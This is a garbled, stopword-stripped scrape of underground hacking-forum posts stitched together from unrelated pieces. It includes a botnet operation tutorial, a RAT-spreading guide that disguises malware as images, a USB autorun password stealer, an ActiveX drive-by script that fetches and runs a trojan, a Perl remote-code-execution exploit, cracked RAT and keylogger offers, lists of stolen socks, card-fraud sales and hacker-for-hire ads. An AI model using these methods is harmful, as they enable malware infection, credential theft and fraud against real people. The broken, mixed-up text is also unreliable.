mobile phone iphone blackberry green bold curve. 
samsung galaxy note tab. 
led series inch oled nokia lumia. 
ipad ipad ipad ipad ipad release ipad rumors ipod ipod classic ipod mini ipod nano ipod touch how order online first you need send links that you choose your product any site. 
pricing will much lower than the market. 
may one half even low more smile emoticon let's enjoy will check the order. 
reach agreement with them will receive the payment from you. 
and started buying them delivered your address you not have worry about security issues make sure safe. 
please send email create your order chat with via yahoo messenger rules and conditions sale stuffs are given you only after payment. 
check stuffs the request the customer not give any tests please dont waste time. 
dont add not ready for biz email for bulk orders. 
not contact when you are not ready for business read the rules and conditions before you contact instant delivery with perfect money and western union only. 
please not contact you know that you are ripper scammer conditions replacement replace any kind stuffs its doesn't work and change instantly within hrs are both here make money respect like respect you contact icq johnsonkelvin mail johnsonkelvin yahoo. 
com come and make long term business and will give you good services here. 
online now contact now. 
Click Search HOME Show Off All FORUMS Community UPGRADE VIP Account SEARCH Search Forum HELP Help Documents MONEY Make Money MORE More Links Offensive Community XVYCTIM Offensive Community Hacks Exploits and Various Discussions Proxies and Socks AGAIN SUPER HTTPs Proxies New Fresh Announcements Some other awesome news Share New Reply Thread Rating Thread Modes AGAIN SUPER HTTPs Proxies New Fresh montana Offline Junior Member Posts Threads Joined Aug Reputation Money Donate This post was last modified Codefire. 
HyperCracker Offline Junior Member Posts Threads Joined Jul Reputation Location The System Country United Kingdom Money Donate Star ByCoder Wrote ATTACH CONFIG ATTACH Here you this awesome rat DOWLOAND xracerx Offline Junior Member Posts Threads Joined Jun Reputation Location Singapore Country Singapore Money. 
Donate ByCoder Wrote ATTACH CONFIG ATTACH Here you this awesome rat DOWLOAND eliabaitel Offline Junior Member Posts Threads Joined Jul Reputation Location California Country United States Money Donate ByCoder Wrote ATTACH CONFIG ATTACH Here you this awesome rat DOWLOAND goraiasish Offline Junior Member Posts Threads Joined Jul Reputation Location india Country India Money. 
Thread Author Replies Views Last Post SUPER FRESH HTTPs PROXIES montana Last Post XVyctim Unblocked Glype Proxies Access blocked sites easily privateloader Last Post sanji HTTP HTTPS Proxies Bond Benz Last Post Bond Benz Leak Proxies Socks Updated sunrise Last Post sunrise Selling Proxies and Socks sunrise Last Post sunrise Leak Clean socks and proxies updated sunrise Last Post sunrise Anonymous Elite HTTP proxies Kilaz Last Post Kilaz Large Proxy List Jan Pratham Last Post sids Glype Proxies with hotlinking disabled privateloader Last Post privateloader FRESH Proxies vps. 
thank uyou for the share. 
cyber ghost vpn about cyber ghost cyberghost important tool for protecting your privacy. 
cyberghost vpn replaces the externally visible address which users have received from their provider when they dial connect the internet with cyberghost vpn address. 
the cyberghost user shares this address with number other users. 
this procedure ensures that the cyberghost vpn address should not assigned one particular cyberghost vpn user. 
communication between the cyberghost vpn user's computer and the anonymization servers also particularly well protected prevent any eavesdropping data transfers. 
this protection set steps when establishing the connection. 
bit ssl encryption used when establishing the connection. 
this case bit aes key negotiated which unique for each connection. 
the actual communication takes place via this aes key. 
privacy cyberghost takes care your unmistakable address and changes from license plate which can clearly identify you every website operator well your own provider just piece metal you share with thousands other internet users. 
spying eye will able tell you from surfers who hit the internet the same time you you are anonymized cyberghosted like use say. 
freedom once ghosted you can roam the internet freely and uncensored visit geo restricted web sites watch blocked videos and investigate all topics interest unhindered from your government your school your university your employee. 
simple example content item like music video clip not available your country just log one our outside your country servers and virtually become inhabitant the respective nation. 
it's just easy that. 
security cyberghost vpn not just only anonymizes you. 
encodes all data leaving your computer well. 
you can look your connection between you and the cyberghost network tunnel with unbreakable solid walls which hides all your data from spying eyes public wlans hot spots and internet cafes. 
and cyberghost does not only concentrate your browser all internet applications will secured this way. 
it's nearly like walking invisible through central park midnight with your wallet wide open and nothing will harm you. 
cause nobody sees you cyber ghost helps protect your privacy the internet and hinder site operators from tracking you down and clearly identifying you. 
get access uncensored websites outside your country outside your office outside your school resp. 
get access blocked websites blocked content circumventing geo other blockades. 
cyberghost let you surf american german dutch wherever you are. 
guard public internet connection wlans hot spots you can make payments transactions without being spied. 
investigate unbothered journalist activist police officer. 
keep private affairs most private adult dating websites highly delicate situations. 
cyberghost privacy proofed anonymous registration separated payment process prepaid cash payments available more than contented. 
users free choice servers more than servers throughout europe and the usa. 
system requirements windows vista bit bit ram cpu ghz take the following steps make yourself anonymous. 
download and install the software. 
create account you are using the software for the first time. 
log the cyberghost vpn system. 
connect the service you want download here mirror link download here pass swapnilhaxor enjoy with ihf. 
botnet the majority answers are finally here color this created for those are confused want bit research. 
are you tired looking for answers well you came right place. 
educational purposes only what will this tutorial include color color what botnet what are botnets made for how can you monetize profit from them where host them known ddos bots how cyber criminals get away with them how people get many bots installs types botnets what are honeypots anonymous scanning crypting bin making undetectable color topic what botnet botnet network compromised computers call them zombies. 
the bot master can control all the computers using his command control server where can initiate various commands. 
usually controls them via standards based network protocols such irc and http. 
most bot masters use irc since its much more secure but personally prefer http since its easier control and manage opinion. 
your too paranoid you should with irc but beware the feds want get they will. 
extend your knowledge suggest visiting this article. 
org wiki botnet topic what are botnets made for there are several purposes. 
some people want earn money and they usually make living either coding them using them send spam steal information etc. 
other people want simply prove that they can and brag about there abilities. 
they are made either steal financial information such bank accounts credit card details and other sensitive details. 
they are called banking bots however not want into detail since this activity disallowed. 
some bots only have ddos functions used launch ddos attacks the majority ddos bots are. 
people either offer services once again gain funds others just for pixels gain fame the internet. 
other bots send spam and recently noticed some bots that can turn them into socks that can very profitable since there high demand for private socks the blackmarket. 
there's options and its your call either money fame. 
extend your knowledge this aspect suggest you visit this. 
business topic how can you monetize profit from them plenty options the most important that you either have large amount bots high quality countries such aus and several other countries. 
why high quality countries since there thing called ppi pay per install. 
they demand the best countries since there more chance advertise and the spec's are better unlike pakistan and indonesia for example. 
this the most common use for botnets and also one the simplest. 
experts estimate that over spam sent from zombie computers. 
should noted that spam not always sent botnet owners botnets are often rented spammers. 
it's the spammers who understand the real value botnets. 
according our data average spammer makes year. 
botnets made thousands computers allow spammers send millions messages from infected machines within very short space time. 
even here you can see that users profit you the service offerings you could see plenty but the majority them simply buy booters and think they run the scene. 
experienced user would rather with private bot for example dirt jumper wich has been cracked really powerful tool made for websites pandora ddos bot notorious bot some people say its good others give bad feedback bot and more most you know these since have seen lot topics where people were trying set them. 
this might interesting and how can miss bitcoins. 
this probably the easiest way profit from your net running miner which will complete tasks and will generate btc. 
most pools payout via paypal its much easier collect revenue. 
note get the best performance better enable gpu computers with ati radeon cards will generate more money watch out luckily have found estimated earnings scheme for bot masters who this activity. 
color botnet mining per day bots bot earnings per day total earnings. 
botnet mining per week bots bot earnings per week total earnings. 
botnet mining per month bots bot earnings per month total earnings. 
color color would say that isn't bad all say had bots would probably work from home. 
color topic where host them all depends. 
say you just wanted small net you would usually with offshore vps not advise shared hosting make sure isn't located the germany and your all good. 
the best countries are probably china taiwan iran ukraine singapore. 
russia they also have some strict laws not understand why most users think that russian providers have immunity that not true. 
your budget you could always hack box and host there. 
but blame yourself once you get yourself removed and all your database will deleted including your bots. 
some users advanced your hosting large botnet and stealing details there called bulletproof hosting which ignores all reports abuse including dmca spamhaus etc. 
you want bulletproof host well tough luck shared hosting goes for more than bucks and servers end. 
really expensive your best call simply get offshore location. 
topic known ddos bots have stated bit information another thread know most you want ddos bot simply because with press button you can cause massive chaos and its possible. 
one the strongest ddos bot dirt jumer which created specifically created attack websites methods such http get sends get requests harder block http post synchronous flood download flood and anti ddos flood. 
the best thing like about most bots these days that they have random user agents and change http headers and pretend legitimate traffic that really smart from the coders side but they are usually really unstable you would rather have loader which type bot which really stable you usually hold bots and can act backbone for the ddos bot you would benefits stability and power. 
topic how cyber criminals get away with them there are several methods such bulletproof hosting which already stated and common but interesting method which large botnets use fastflux most you not know what that and suggest you read. 
can also refer the combination peer peer networking distributed command and control web based load balancing and proxy redirection used make malware networks more resistant discovery and counter measures. 
the storm worm one the recent malware variants make use this technique. 
the basic idea behind fast flux have numerous addresses associated with single fully qualified domain name where the addresses are swapped and out with extremely high frequency through changing dns records. 
obviously you wouldn't have that your starting off what would suggest simply get cheap vps with ram and setup reverse proxy that will work for you. 
these are probably the only methods know the moment. 
topic how people get many bots installs this interesting many you have wondered how people get many bots and sell them thousands that's right thousands. 
they either have some next spreading skills which they don't they buy exploit kit. 
what exploit kit it's type crime ware which scans the computer for patched exploits you could say its silent driveby but only say will download the file that's why they get bulk traffic real visitors and send their exploit link then some percentage the traffic gets generated into installs. 
usually people get low quality countries such pakistan indonesia egypt since they don't know what anti virus and they have pirated version windows. 
your probably interested but the cheapest packs for monthly but its wise investment course you know what your doing. 
most common exploit kit. 
html list exploit kits. 
oit kits color topic types botnets color color ddos bots initiate ddos attacks servers. 
banking bots identity theft. 
don't want into detail spam bots send out spam. 
socks bots create socks socks proxies. 
bitcoin bots generate virtual currency called btc. 
loaders hold bots stable environment. 
color topic what are honeypots what honeypot you consider getting into botnets you should know. 
you catch honeypot would probably some experienced user who wants trace your botnet another hacker who want's get into your botnet and steal some bots pig. 
once you catch honeypot your bot will analyzed and will traced. 
the incoming packets will sniffed and your panel could easily compromised within seconds. 
that's about for you know there's not much you can say and about. 
color really useful resource color. 
com color suggest everyone visit and you would understand how works. 
color topic anonymous scanning some you simply scan with novirusthanks virustotal. 
that probably the most wrong thing your journey never ever scan with them unless you want your files detected. 
would strongly recommend anonymous scanning servers those who don't distribute your file the companies once its scanned won't analyzed anyone. 
recommend the following services. 
those are the know and can assure that you will receive quality scanning services with them. 
topic crypting bin making undetectable this important most bins will detected most anti viruses and not want that since there will lower executions from the installs either purchase spread. 
strongly recommend crypters coded native languages since the stubs are usually smaller and the execution rate will higher however your looking for long lasting stubs you would rather with visual basic stubs since doesn't look that suspicious. 
recommend father crypter root crypt. 
haven't seen decent crypters here but heard some good feedback about cloudcrypter. 
remember run update your bots regular basis you won't loose any machines. 
com watch mbuqrde wrc botnets part. 
ure relmfu botnets part. 
ure relmfu rootkits the end cool cool. 
it's now instagram account was hacked february can someone please help get back i've been trying get back since last year one has helped this person who's account has been posting things there also using pics pretending they're they've been doing for almost year need account back can't pay i'm but can someone please help. 
html the attacker already waiting inject payload into binaries served over HTTP This attack possible because lot tool websites still serve binaries via non SSL TLS means. 
Registration Code Code personal code Key UTSR YZXV VSTQ XXWZ Code. 
carding website hotels Quote very easy carding site that's how use the site and the link. 
this simple guide read somebody else facebook messages without any effort cheers mike wrote table width hello friends this trick still working dont beleieve look the below trick posted. 
seriously hit that button that's motivating factor client crack don't think necessary for virus scan but for who skeptical here. 
more toys try out. 
thanks for the leak thanking you advance. 
greed wrote this tested and working silent bitcoin miner. 
features anti sandboxie vmware anubisbuddy virtualpc startup melt proxy working windows windows vista windows windows download below. 
you can connect austria chile france iceland isle man italy luxemburg poland romania spain sweden switzerland ukranie united kingdom united states you want download here hide. 
geai hide just install the vpnium. 
bond benzthanks for share bro wrote download rep don't forget. 
Middletown United States Checked socks. 
Durango United States Checked socks. 
Pollock Pines United States Checked socks. 
Salem United States Checked socks. 
Wabasso United States Checked socks. 
Alpine United States Checked socks. 
Tucson Unknown United States Checked socks. 
Ontario Unknown United States Checked socks. 
Austin United States Checked socks. 
Saint Paul Unknown United States Checked socks. 
Lansing United States Checked socks. 
san angelo united states checked socks. 
cambridge united states checked socks. 
sorrento united states checked socks. 
batavia unknown united states checked socks. 
orlando united states checked socks. 
las vegas united states checked socks. 
tomah united states checked socks. 
wadsworth united states checked socks. 
bridgeport united states checked socks. 
amesbury united states checked socks. 
lincoln united states checked socks. 
round hill united states checked socks. 
cryptoprevent tool created american security expert nick shaw. 
this tool applies number settings your installation windows that prevents cryptolocker from ever executing and has been proven work windows and windows environments. 
contains new feature called cryptoguard that monitors your file system for suspicious operations. 
bitdefender anti cryptoblocker encryption blocking tool that can detect and block malware from installation. 
cool everyone liked thanks. 
thanks sent from using tapatalk. 
assume that guys already got your rat setup and working condition fud. 
not going that part. 
just telling here way spread your server and get some victims. 
and btw this first tut ever ill need your feed back guys. 
ewhore spreading introduction ewhore spreading one the easiest spreading methods. 
will get you lot victims and can earn you some good cash you add more black hat into. 
preparations once you got your server fud you need make sure you bind with picture and add image icon. 
here comes the important part. 
change the extension your file from. 
com and rename your picture your msn address. 
that way your server won't suspicious. 
not many people knows about that don't worry about getting caught. 
some websites which you can spread your server. 
com not good for lot bots but you can get some rich pedos. 
com you will get lot teens from there. 
com still good but high risk getting banned from admin. 
net lot victims here. 
net not really good but you can try. 
over all idea ewhoring spreading good but involves lot work. 
it's not the same thing torrent you just something else and get victims. 
i've done few times and believe brought lot bots. 
this spreading method can bring you lot cash you include ewhoring with. 
this method takes time and persistence and it's the one would suggest you the most. 
ill soon doing the tut for some other spreading methods soon. 
private windows rtm genuine full final versions and bit pro enterprise and aio package windows windows reimagined and reinvented from solid core windows speed and reliability. 
windows pro succeeds windows professional and ultimate and targeted towards enthusiasts and business users includes all the features windows. 
additional features include operating remote desktop server the ability participate windows server domain encrypting file system hyper and virtual hard disk booting group policy well bitlocker and bitlocker. 
includes the windows iso files aio package windows activation and usb dvd boot tool. 
apps are the heart windows. 
you able get speed quickly with set built apps for the thifngs you the most. 
designed for your connected lifestyle these apps integrate with the services you already use. 
the windows store you can search for browse thousands apps all grouped easy find categories. 
highlight great apps for you and provide quick access frequently downloaded apps. 
you can also see how other people have rated apps. 
you always know what interesting new and popular. 
windows cloud connectedyour microsoft account like portable personal that appears any windows device you using. 
sign your windows device with your microsoft account and you immediately connected the people files and settings you care about. 
your comes life with all the things that make windows yours including your start page themes language preferences browsing history and browser favorites. 
you can connect your favorite services your microsoft account too services like microsoft hotmail microsoft messenger facebook linkedin twitter and more. 
and you can immediately get your photos docs and other files whether they microsoft skydrive facebook flickr other services. 
windows pro windows pro succeeds windows professional and ultimate and targeted towards enthusiasts and business users includes all the features windows. 
windows enterprise windows enterprise provides all the features windows pro with additional features assist with organization. 
this edition only available software assurance customers and was released august. 
links are aio all one includes all windows versions and bit activator includedx bit windows windows windows pro windows pro windows pro windows pro with media center windows enterprise windows enterprise bit windows windows windows pro windows pro windows pro windows pro with media center windows enterprise windows enterprise download burn dvd using poweriso included select desired windows version key serial needed run the kms activator depending your installed version run administrator rarefile. 
net fam ufzng win. 
net ywmn ljdrb win. 
raractivator onlyat long last windows activator for all versions includes automatic activator and keys for manual activation tested and working please read the simple instructions included the download. 
net qcd ftv win. 
rarnew working keys and instructions for september. 
net trh dctxv win. 
com file ayk pywbtj. 
new working serial keys and video tutorial for activation. 
com file ayjt qbn. 
windows pro bit english. 
net pzymy qmyvmp win. 
com file ayq wwmb. 
com file ayq vrlv. 
com file ayq vrmb. 
com file ayq wwmr. 
com file ayq wwoj. 
com file ayq vro. 
com file ayq wztv. 
com file ayq wzub. 
com file ayq wqab. 
com file ayq wzvn. 
com file ayq wzv. 
net fyn ibdot win. 
net zpqq zen win. 
net zpnyg foj win. 
net xay qgsy win. 
com file ayq wqfn. 
com file ayq wqeb. 
com file ayq wqer. 
com file ayq wtir. 
com file ayq wtg. 
com file ayq wtkz. 
com file ayq wtlf. 
windows enterprise bit english. 
net vtd knm win. 
net mnr gwl win. 
net mzic oodua win. 
net wcxyw utw win. 
net ykgyutpf xmd win. 
com file ayjwkqp zpf. 
com file ayjwkqp zqb. 
com file ayjwkqp zub. 
net mxb zjql win. 
net hak ncmxfrm win. 
net emya wbbir win. 
net udi syz win. 
net lily lrtmjl win. 
com file ayjwkqp tgj. 
com file ayjwkqp tfn. 
com file ayjwkqp wkj. 
com file ayjwkqp wib. 
language packs will posted soon for the following english japanese arabic bulgarian czech danish german greek spanish estonian finnish french hebrew croatian hungarian italian lithuanian latvian dutch norwegian polish portuguese brazil romanian russian slovak slovenian serbian swedish thai turkish ukrainian multi language chinese hong kong sar chinese taiwan chinese simplified portuguese portugal kyrgyz. 
trident includes icon changer and binder use this personally but just gave title and put here for everyone else tongue know there's probably loads like this but just thought i'd release victoire bit basic and simple but yeah. 
enjoy virus scan the scan brings three errors but they are just mistakes. 
dont know why its happened. 
download hide found this old hack pack had run with caution run safe not responsible for any damage caused. 
Now login with the account you registered add shells and boot away TuT MiiNT KiiLzZ. 
prince chaddha wrote hidden content you must reply see linksfacebook account reset hijack session day exploit only for url attach config attach. 
wrote yea you heard correct its leaked not believe take look the link ereply see content. 
lets see that thing hope works. 
thanks sent from iphone using tapatalk. 
usb password stealer this tutorial will walk you through setting usb flash drive steal the saved passwords computer. 
you're looking for super tiny super discreet flash drive recommend sandisk cruzer fit usb. 
low profile flash drive sdcz open notepad wordpad type autorun open launch. 
bat action perform virus scan save this autorun. 
inf open new notepad wordpad document type start mspass. 
txt save this launch. 
bat copy the autorun and launch file your usb. 
net and download the programs named step extract the files you downloaded your desktop and copy all the. 
exe files your usb remove and insert your usb click the option perform virus scan this exemple you want say something else the autorun file and change computer usb drive and open you will now see some text files you open them you will see usernames and passwords notice this only recovers passwords that have once been saved your computer seriously hit that button that's motivating factor don't think necessary for virus scan but for who skeptical here. 
cracked general you spread warrior for android java. 
there are instructions for working with the software the folder droidjack readme. 
txt file seriously hit that button that's motivating factor password hack port. 
note this not crack just found and may infected please run deep scar and download your own risk. 
thank you very much for this mate. 
this looks cool want see. 
painkiller wrote registration code code personal code key utsr vstq code. 
thank very much for this please comment you download keep thread alive. 
this awesome for seccurity puporses. 
great keylogger realy usefull for controling younger brother. 
onion onice thank you gonna check outn tor almost undetectable all the anti viruses. 
don't take any tension. 
can set proxy mozilla. 
click firefoox menu options advanced you can see option connection configure how firefox connect the internet settings set proxy and post and apply. 
dance yeah had earlier were using and the port was but now when fortiguard has been used proxy with port doesnt work. 
how find which port open university. 
there any personal yours then plz give that can contact you like facebook gmail etc. 
i'm curious see there's any sites haven't seen yet. 
open that folder and there text file open follow instruction download. 
audiada wrote pratham wrote happy new year. 
painkiller wrote hidden content you must reply see linkshere quick tutorial showing how hack steam accounts with program called quickbreak bruteforcer. 
nice effort friend god bless. 
that all seriously hit that button that's motivating factor note always perform virus scan and download your own risk. 
Clarksville United States Checked socks. 
Edgerton United States Checked socks. 
Greenville United States Checked socks. 
Dubuque United States Checked socks. 
Brandon United States Checked socks. 
New Alexandria United States Checked socks. 
Saint Albans United States Checked socks. 
Vista United States Checked socks. 
Cos Cob United States Checked socks. 
let see how let see how. 
nice you are awesome. 
lets see how goes. 
mourad wrote tnx man for this informaton. 
marcin wrote hell you crack this simple program this trial. 
what the language the application. 
bayonne united states checked socks. 
dickinson unknown united states checked socks. 
homestead united states checked socks. 
anaheim united states checked socks. 
west sacramento united states checked socks. 
leesburg united states checked socks. 
oak park united states checked socks. 
hope the link isnt broken lel. 
isnt just mere executable file created generate random hashes and then will ask you complete some kind survey decrypt the hash. 
i'm not into open argument tested all the site after posted. 
htm tried the sites worked great. 
just saying cause tried. 
this has the most awesome thing yet. 
awesome leak dude thanks for sharing. 
alright will try this. 
thx alot mate looking forward try. 
try maybe isworth while. 
click search home show off all forums community upgrade vip account search search forum help help documents money make money more more links offensive community xvyctim offensive community hacks exploits and various discussions hacking tools and programs cracked luxnet remote administration tool announcements some other awesome news share pages next new reply thread rating thread modes cracked luxnet remote administration tool codefire offline administrators icq yahoo posts threads joined jun reputation location. 
petersburg country russia money. 
donate diamond blink use your own risk blink cracked just saying that this very badly coded rat the biggest skid this world that xillux. 
jpg reply and see downloading link hide reply hidden content you must reply see links hide reply image icq logo. 
gif icq image yahoo messenger icon. 
png jabber codefire xmpp. 
blazelord offline junior member posts threads joined mar reputation location now see country afghanistan money. 
donate pls let have badzl offline junior member posts threads joined jan reputation money. 
donate thank you sir river offline junior member posts threads joined jun reputation location hackers country algeria money. 
donate maximwell offline junior member posts threads joined jun reputation location live country australia money. 
donate thanks for please you have crypt post heyklog offline junior member posts threads joined jun reputation location paris country turkey money. 
donate thanks bro perfect shubham prajapati offline member posts threads joined may reputation location varanasi country india money. 
donate what soft codefire sir its just amazed. 
jinxrr offline member posts threads joined jun reputation location cork country ireland money. 
donate cheers man great darksec offline junior member posts threads joined jun reputation location pakyo country philippines money. 
donate nice man and good share. 
spyjana offline member posts threads joined jul reputation location northcentral country sri lanka money. 
donate thanks bro perfect enter keywords search thread pages next new reply quick reply message type your reply this message here. 
thread author replies views last post rdp bruterx rdp scannerx cracked minutes ago last post xvyctim worm generator tool. 
preview release privateloader last post xmarco dgl ios. 
ipsw tool privateloader last post privateloader free everyone team leak locations trace tool codefire last post dannyonlock hot new private sqli tool bond benz last post xtremotino domain analyzer security tool codefire last post dorkerdevil free best hacking tool for google chrome hackers toolkit forummailpk last post forummailpk havij. 
pro portable cracked codefire last post hackfucker tool gmail password cracker good for invading paypal accounts xcoding team last post cookiecatcher session hijacking tool codefire last post pahan view printable version send this thread friend subscribe this thread forum jump users browsing this thread xvyctim about offensive community offensive community world best underground hacking forum that provides tutorials latest hacking techniques free tools and great online teaching our members. 
guys this quick tutorial how scan for php code files for such cookie manipulation sqli rfi xss code execution etc etc for linux users type this code wget. 
net project rips scanner rips. 
zip var home usersname file path whichever one use unzip rips. 
service apache start for windows users download wamp server right click icon open htdocs and place the files there once done for either localhost rips. 
then you will download php code such cms place the cms inside the var wamp htdocs make dir called vulnscan then once have placed the files vulnscan back localhost and put the path var vulnscan the far right and click scan all not all serverside just all will display php code and what all has found you can dataleaks well view detailed report the vuln found generates auto exploit using curl you have modify tho enjoy good. 
thanks for share man. 
kudos all need pdf exploit doc pdf jpeg that will compatible with almost all botnet. 
hey guys finally releasing own hack pack there lots stuff this big pack enjoy download. 
ill trade you discover card full details for. 
thx for the post. 
indian hack forums article arham muhammad shared intro basics remote code execution and how develops exactly how attacker get advantage over this vulnerability and misuse prevention and filtration conclusion intro the sic intr remote code execution yet another common vulnerability existing wide range web apps the current era. 
allows remote attacker execute arbitrary code the sytem with administrator privelages without the attention the owner the targetted site. 
it's just not hole avoid but extremely risky vulnerability which can endanger your site different attacks malicious deletion data even worst defacing basics remote code execution and how develops basic remote code executions now will highlight some basics remote code executions being planted that exist still this era web app development. 
will now examine comment form getting comments from user submit. 
php and posting comments. 
php are analyzing submit. 
php with simple post method that submits the gathered user input and forward the request comments. 
php' 'a' fwrite log. 
comments fclose log now just looking could very easily proove insane how well can see there form that submits user inputted what ever comments comments. 
php including malicious which writes the comments exactly user's input witout being sanitized. 
this means that attacker here getting full advantage exploit the vulnerable comments submission form executing some malicious request which could just gather server details like using phpinfo which exceptional case for attackers these days even more pathetic could getting shell vulnerable server. 
will take another example using get request display error message and log the with the specific message. 
it's common vulnerability planted the coder while developing website for organization etc. 
php' 'a' fwrite error. 
fclose error this piece not only effect and vulnerable remote code execution but also several other attacks including xss javascript injection vbscript injection etc. 
this will too allow remote attacker posion the log file and inject malicious code the logs. 
now will highlight another type remote code execution can also defined posioning the cookies indent. 
php isset cookie 'admin' header location admin. 
php user admin indent can just more complicated than that like most possibly there can usage sessions verify admin the variable admin would match how ever this just sql query used select administrator the user when admin the query giving possibly another vulnerability yeah right sql injection remote code execution also possible through headers deposition arbitrary file upload theres file processing system and not sanitized. 
exactly how attacker get advantage over this vulnerability and misuse will highlight exactly how attacker manage this likely supposing attacker finding vulnerable target and got hold the news that get variable have been implemented here order log particular data some specific file lets say 'x'. 
the attacker will struggle their best get hold the file where the data being wrote path arrays are used the attacker for successfull exploitation and then course the attacker will likely inject some malicious string order check it's filtering the output this case it's not doing any checkup using htmlentities funcs. 
the attacker will likely get hell lot benefit from this. 
most probably will try spawn shell the targetted server gain full advantages his her blackhat stuff supposing attack the slave host code hidden content you must reply see links passthru get 'attacker' this will the work some other cases like the one code isset admin could also exploited with great ease the attacker just have spoof the variable from the server request and that's not all difficult being get variable code hidden content you must reply see links this will and for the cookies thingy it's same. 
just need edit cookies and you are the master supposingly the below pattern code isset cookie some authencation headers below. 
this type pattern you just change the cookies administrator and tada you are admin it's better handle the case with care. 
will now write little poc proof concept order explain and exploit the target remotely and quite easily it's not good but important use such kind script expoit the issue and execute the command successfully since the browser will surely encode your tags making the request not all efficient and successful the below script would bypass this and fulfill it's purpose all cost poc code usr bin perl php endangers remote code execution poc inject and execute malicious request probably spawning and executing shell command use lwp simple use lwp useragent sub header print usage example roc. 
hidden content you must reply see links info. 
php hidden content you must reply see links inject you may notice some additional funcs used inject these are execute and produce successful result would help and bypass magic quotes func and stripslashes too that would possibly lot good the attacker argv header target argv file argv var argv log argv shell argv command argv agent lwp useragent new exec agent get exec exec agent get exec die host seems down print injected successfully print check the shell manually. 
remote code execution explanation poc for exploiting the roc remote code execution vulnerability. 
code null bytes injection piece code like one mentioned below would wonder attacker how eliminate the compulsory file extension and exploit the vulnerability use the inclusion execute shell upon the tagetted server. 
now can clearly declare the above code critical vulnerability helping attacker lfi rfi depending the attacker's strategy. 
but it's clear that the inclusion would failed because the extension increment issue. 
now the attacker would surely like this all and will try elminate the extension using null bytes posioning null bytes the server. 
below example what exactly happens when inclusion performed such case indent hidden content you must reply see links indent since the code adding extensions after file variable means would adding. 
txt thus making the exploitation dumb simple would make the request looks like code hidden content you must reply see links where such case dont exist now the attacker will eliminate the extension successfully exploit the issue posioning null bytes the request made below how the attacker will manage code hidden content you must reply see links this would make the request eliminate the additional extension and would successfully exploit the issue prevention and filtration prevention it's better design what ever form such way that sanitizes and filters user input before writing actually executing the request the server. 
this can done easily with the ease php built htmlentities and most importantly strip tags and stripslashes functions. 
this will abort malicious request and will execute the request after the malicious tags had been aborted. 
for instance attacker trying inject piece code 'y' get variable. 
code hidden content you must reply see links phpinfo now the file under htmlentities strip tags stripslashes protection then this will make the request the attacker totally dumb and course use supposingly simple filtration pattern code. 
php' 'a' fwrite data fclose this will abort the tags and ofcourse will make the rest the piece code use since phpinfo not insane looks malicious the server will only write that exact ascii form the file. 
there are even better cures using magicquotes how ever can cause some other complicated problems not used properly it's not recommended beginners until they know what they are doing. 
conclusion conclusion have used several examples explain the basics remote code execution and exactly how it's planted web apps. 
have tried level best explain the terms and consequences simple and easy words including all piece codes mentioned here. 
however don't hold any responsibility any misuse dirtyworks performed gaining the knowledge within the paper. 
beside this strongly recommend all through it's simple and easy and will awoke the dangers that can encountered little careless mistakes rolleye. 
please virus total scan report. 
i'm ghost freelance professional hacker. 
enjoy doing all types hacks. 
hack into any facebook account credit card top ups hack generic website hack into any phone. 
expose that cheating partner. 
hack into any website matter how secured. 
hack into any government agency website. 
hack into any security agency website and erase criminal records. 
hack into any database system. 
hack word press blogs. 
sale different hack tools. 
untraceable internet protocol etc. 
have you your child been bullied online before and you want get back. 
hack into any instagram gmail account. 
boost your personal company likes facebook. 
boost your number followers instagram. 
these are few among all can i'm greyhathackers memeber that alone speaks for its self. 
you can reach this email ghost greyhathacker gmail. 
trial will convince you. 
how crack steam accounts. 
linke kla sagusten skip bas lcak freler. 
download here hide reply attach attach hide reply. 
looking other peoples watsapp chats updated now works. 
color all you must have heard tht some one got infected with trojan visiting some website. 
going help you understand how tht done look this html code color. 
createelement object cls clsid cls cls cls clsfull cls cls cls cls. 
setattribute classid clsfull strr mic strr roso strr. 
strr xml strr strr strr strr strr strr strr set. 
strb strb strb set. 
exe scripp scrip scripp ting scripp. 
fil scripp esyste scripp mobject scripp scripp scripp scripp scripp scripp set. 
createobject scripp set tmp. 
shellexecute open color this normal html code which would create simple webpage. 
wat hav server file your trojan you will have upload some webhosting and then change the link the server file the code and then save this code index. 
html and then upload the same host. 
all done now everytime someone opens that webpage they would infected with your trojan's server update most the programz dectecting this typ codes now any way hope this helps understand the logic and script readin this hope fynd yusefull color. 
thx bro was searching for. 
hackers have great start new year giving public threat apple online icloud service. 
the tool dubbed idict actually makes use exploit apple's icloud security infrastructure bypass restrictions and two factor authentication security that prevents brute force attacks and keeps most hackers away from gaining access users icloud accounts. 
install curl for your navigate. 
idict your web browser preferably firefox chrome safari. 
hope this one still works. 
i'll see how this works what language written bond benz wrote sql scanner. 
add save and load own dorks now download nice thread approve. 
pootr wrote why don't need you. 
how hack acc wiht just victims username nothing ellse other than pishing keylogging and bruteforce. 
language borland delphi home page. 
htm protection non method used patching tutor phoenix team xfactor home the warriors tut download code url. 
Download Link Updated Quote. 
html file example url after click. 
html now you can see nice file manager. 
reply for content lol. 
codefire wrote how crack wifi password android crack wifi password android andthanks roid most popular for any users. 
xss filter evasion cheat sheet visit here. 
very nice dear friend. 
table width guys today would like share method how verify your paypal without using your own credit card. 
gedad hide cheers mike table. 
htaccess will only effective this directory although depending how Apache set may affect other folders recursively Next put the following code Code Quote AddType application. 
For instance Code Quote AddType application php. 
doe going there wrote hider pro. 
seriously hit that button that's motivating factor note always perform virus scan and download your own risk. 
What differentiates from most other Warbot HTTP based robots their desktop AJAX powered single Report Task. 
Apart from these amazing features the bot itself has the following features extremely stable DDoS HTTP TCP UDP with throttle control automatic and manual bot Size small only kilobytes Coded pure and assembler for Speed and Reliability dependencies other than the standard Windows DLLs Bypass UAC Works Windows and Windows Vista bot extremely stable full error tolerant Installation Process Take the control panel has the following features Desktop fully featured and easy use too Save icon positions Complete Windows Live Stats View your botnet army updates every seconds Requires little bandwidth This means you not need pay for host you not want Coded Well OOP PHP. 
thanks for share mate useful tool. 
need help gaining access passwords facebook gmail instagram bbm yahoomail snapchat twitter hotmail badoo zoosk various blogs icloud apple accounts etc. 
password retrieval breaching bank accounts for local and international banks block transfers make transfers clear debts pay for bills give way rates breach web host servers firewall breaches application cracks change school grades professional hacking into institutional servers clearing criminal records mobile airtime recharge keylogging smartphone tablet portable device hacks hacks any and tracking and genral tracking opperations. 
contact via mail geohacksjr gmail. 
let see this list deep. 
patch ddl see how download how download from dailyuploads how download from userscloud you might see page direction time pop. 
just close redirected page instantly then click above button spent lot hours test and upload you like post dont away after download seriously hit that button that's motivating factor note always perform virus scan and download your own risk. 
web sorrow web server security scanner which used for checking web server for version detection enumeration and server information. 
this tool based perl. 
